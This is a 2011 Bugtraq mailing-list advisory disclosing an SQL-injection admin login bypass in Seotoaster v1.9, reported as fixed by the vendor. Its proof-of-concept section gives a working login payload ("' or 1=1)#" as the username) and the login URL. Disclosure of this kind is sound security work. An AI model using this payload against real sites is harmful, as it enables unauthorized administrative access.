[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Seotoaster SQL-Injection Admin Login Bypass

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Seotoaster SQL-Injection Admin Login Bypass
From: security@xxxxxxxxxxxx
Date: Thu, 15 Dec 2011 18:19:36 GMT

Advisory:               Seotoaster SQL-Injection Admin Login Bypass
Advisory ID:            INFOSERVE-ADV2011-06
Author:                 Stefan Schurtz
Contact:                security@xxxxxxxxxxxx
Affected Software:      Successfully tested on Seotoaster v.1.9
Vendor URL:             http://www.seotoaster.com/
Vendor Status:          fixed

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login

==================
PoC-Exploit
==================

http://<target>/seotoaster/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version

====================
Disclosure Timeline
====================

15-Nov-2011 - Secunia SVCRP (vuln@xxxxxxxxxxx)
15-Dec-2011 - fixed by vendor

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt

Prev by Date: New IETF I-Ds on Fragmentation-related security issues
Next by Date: [ MDVSA-2011:188 ] libxml2
Previous by thread: New IETF I-Ds on Fragmentation-related security issues
Next by thread: [ MDVSA-2011:188 ] libxml2
Index(es):
- Date
- Thread